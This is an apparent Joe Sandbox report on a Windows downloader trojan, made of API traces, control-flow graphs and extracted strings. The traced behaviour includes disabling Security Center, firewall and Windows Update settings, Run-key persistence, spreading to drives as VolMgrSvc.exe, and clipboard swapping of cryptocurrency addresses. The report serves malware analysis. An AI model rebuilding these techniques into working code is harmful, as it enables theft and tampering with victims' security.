ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f84 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 call 40d8c0 47->56 56->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-745901262
                                                                                • Opcode ID: 5d2210e2075790dfbba300687ee5d24c3552d18a1fa068fed954528d406d25e8
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: 5d2210e2075790dfbba300687ee5d24c3552d18a1fa068fed954528d406d25e8
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 40ee30-40ee90 memset * 2 CreateProcessW 84 40eea1-40eec5 ShellExecuteW 83->84 85 40ee92-40ee9f Sleep 83->85 87 40eed6 84->87 88 40eec7-40eed4 Sleep 84->88 86 40eed8-40eedb 85->86 87->86 88->86
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 93 406650-406665 _chkstk 94 406667-406669 93->94 95 40666e-406720 wsprintfW * 5 PathFileExistsW 93->95 96 406b48-406b4b 94->96 97 406722-406743 call 40ec20 95->97 98 406764-406773 PathFileExistsW 95->98 97->98 107 406745-40675e SetFileAttributesW DeleteFileW 97->107 99 406803-406812 PathFileExistsW 98->99 100 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 98->100 104 406814-40681a 99->104 105 406859-40687a FindFirstFileW 99->105 102 4067a9-4067ba CreateDirectoryW 100->102 103 4067cb-4067da PathFileExistsW 100->103 102->103 110 4067bc-4067c5 SetFileAttributesW 102->110 103->99 111 4067dc-4067f2 CopyFileW 103->111 112 406834-406847 call 406400 104->112 113 40681c-406832 call 406400 104->113 108 406880-406938 105->108 109 406b42 105->109 107->98 114 406942-406956 lstrcmpW 108->114 109->96 110->103 111->99 115 4067f4-4067fd SetFileAttributesW 111->115 122 40684a-406853 SetFileAttributesW 112->122 113->122 118 406958-40696c lstrcmpW 114->118 119 40696e 114->119 115->99 118->119 123 406973-406984 118->123 124 406b19-406b2f FindNextFileW 119->124 122->105 125 406995-40699c 123->125 124->114 126 406b35-406b3c FindClose 124->126 127 4069ca-4069d3 125->127 128 40699e-4069bb lstrcmpiW 125->128 126->109 131 4069d5 127->131 132 4069da-4069eb 127->132 129 4069bd 128->129 130 4069bf-4069c6 128->130 129->125 130->127 131->124 134 4069fc-406a03 132->134 135 406a73-406a7c 134->135 136 406a05-406a22 PathMatchSpecW 134->136 139 406a83-406a92 PathFileExistsW 135->139 140 406a7e 135->140 137 406a24 136->137 138 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 136->138 137->134 138->135 142 406a94 139->142 143 406a99-406ae9 wsprintfW * 2 139->143 140->124 142->124 144 406b03-406b13 MoveFileExW 143->144 145 406aeb-406b01 call 406510 143->145 144->124 145->124
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(00000000), ref: 004048BC
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
                                                                                • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
                                                                                • StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
                                                                                • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
                                                                                • StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
                                                                                • isalpha.NTDLL ref: 00404E14
                                                                                • isdigit.NTDLL ref: 00404E2B
                                                                                • StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
                                                                                • StrStrW.SHLWAPI(00000000,band), ref: 00405326
                                                                                • StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
                                                                                • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
                                                                                • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
                                                                                • StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
                                                                                • StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405483
                                                                                • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004054B1
                                                                                • memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004054DB
                                                                                • OpenClipboard.USER32(00000000), ref: 004054E3
                                                                                • EmptyClipboard.USER32 ref: 004054ED
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 004054F9
                                                                                • CloseClipboard.USER32 ref: 004054FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                • API String ID: 2780752356-1454159098
                                                                                • Opcode ID: db0cde2cd50ccb5069a51a9c4317994cb8735621270c1e5570870890d393e6db
                                                                                • Instruction ID: 26410022a6445c47d5157de28e84b6b5fde917cb10c9abdd84e28c21981b130d
                                                                                • Opcode Fuzzy Hash: db0cde2cd50ccb5069a51a9c4317994cb8735621270c1e5570870890d393e6db
                                                                                • Instruction Fuzzy Hash: 0E8239B0A00218EACF548F41C0945BE7BB2EF82751F60C06BE9456F294D77D9ED1DB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID: Y
                                                                                • API String ID: 673498613-3233089245
                                                                                • Opcode ID: e0219c0cb63c951aee207acb5c20a8eba96760fb7fce38bb851f4f92132f37b8
                                                                                • Instruction ID: 91a0cfa4af347c69fbb9c53c66948b689c70d87f72a9d4407fdf19585fed71d9
                                                                                • Opcode Fuzzy Hash: e0219c0cb63c951aee207acb5c20a8eba96760fb7fce38bb851f4f92132f37b8
                                                                                • Instruction Fuzzy Hash: 30D22979D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630BA95DF80

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: c852d1659e7a65a571c4b59e3ddf7e14438d3a7a61dc4406c53c3f8d29bf0a61
                                                                                • Instruction ID: ca30ecb1613d8b6096c3d6248fe69ff98c04f7b8c63c1f977ddd3c5f0a8ac617
                                                                                • Opcode Fuzzy Hash: c852d1659e7a65a571c4b59e3ddf7e14438d3a7a61dc4406c53c3f8d29bf0a61
                                                                                • Instruction Fuzzy Hash: EDD22979D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630BA95DF80

                                                                                Control-flow Graph

                                                                                control_flow_graph 623 405910-405932 GetWindowLongW 624 405934-40593b 623->624 625 405956-40595d 623->625 626 405941-405945 624->626 627 4059c7-4059d8 IsClipboardFormatAvailable 624->627 628 405986-40598c 625->628 629 40595f 625->629 634 405964-405981 SetClipboardViewer SetWindowLongW 626->634 635 405947-40594b 626->635 632 4059e3-4059ed IsClipboardFormatAvailable 627->632 633 4059da-4059e1 627->633 630 4059a6-4059aa 628->630 631 40598e-4059a4 SetWindowLongW 628->631 636 405b44-405b5d DefWindowProcA 629->636 637 4059c2 630->637 638 4059ac-4059bc SendMessageA 630->638 631->637 640 4059f8-405a02 IsClipboardFormatAvailable 632->640 641 4059ef-4059f6 632->641 639 405a0b-405a0f 633->639 634->636 642 405951 635->642 643 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 635->643 637->636 638->637 645 405a15-405a1f OpenClipboard 639->645 646 405adf-405ae3 639->646 640->639 644 405a04 640->644 641->639 642->636 643->636 644->639 645->646 649 405a25-405a36 GetClipboardData 645->649 647 405ae5-405af5 SendMessageA 646->647 648 405afb 646->648 647->648 648->636 650 405a38 649->650 651 405a3d-405a4e GlobalLock 649->651 650->636 652 405a50 651->652 653 405a55-405a66 651->653 652->636 654 405a68-405a6c 653->654 655 405a89-405a9c call 405630 653->655 656 405a9e-405aae call 405750 654->656 657 405a6e-405a72 654->657 663 405ab1-405ac5 GlobalUnlock CloseClipboard 655->663 656->663 659 405a74 657->659 660 405a76-405a87 call 405510 657->660 659->663 660->663 663->646 667 405ac7-405adc call 4048a0 call 40a660 663->667 667->646
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                control_flow_graph 698 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 699 406565-406579 lstrcmpW 698->699 700 40663f-406642 698->700 701 406591 699->701 702 40657b-40658f lstrcmpW 699->702 704 40660c-406622 FindNextFileW 701->704 702->701 703 406593-4065dc wsprintfW * 2 702->703 705 4065f6-406606 MoveFileExW 703->705 706 4065de-4065f4 call 406510 703->706 704->699 707 406628-406639 FindClose RemoveDirectoryW 704->707 705->704 706->704 707->700
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
• htons.WS2_32(?), ref: 00402101
• bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
• listen.WS2_32(?,7FFFFFFF), ref: 0040212F
• WSACreateEvent.WS2_32 ref: 0040213A
• WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
• String ID:
• API String ID: 1603358586-0
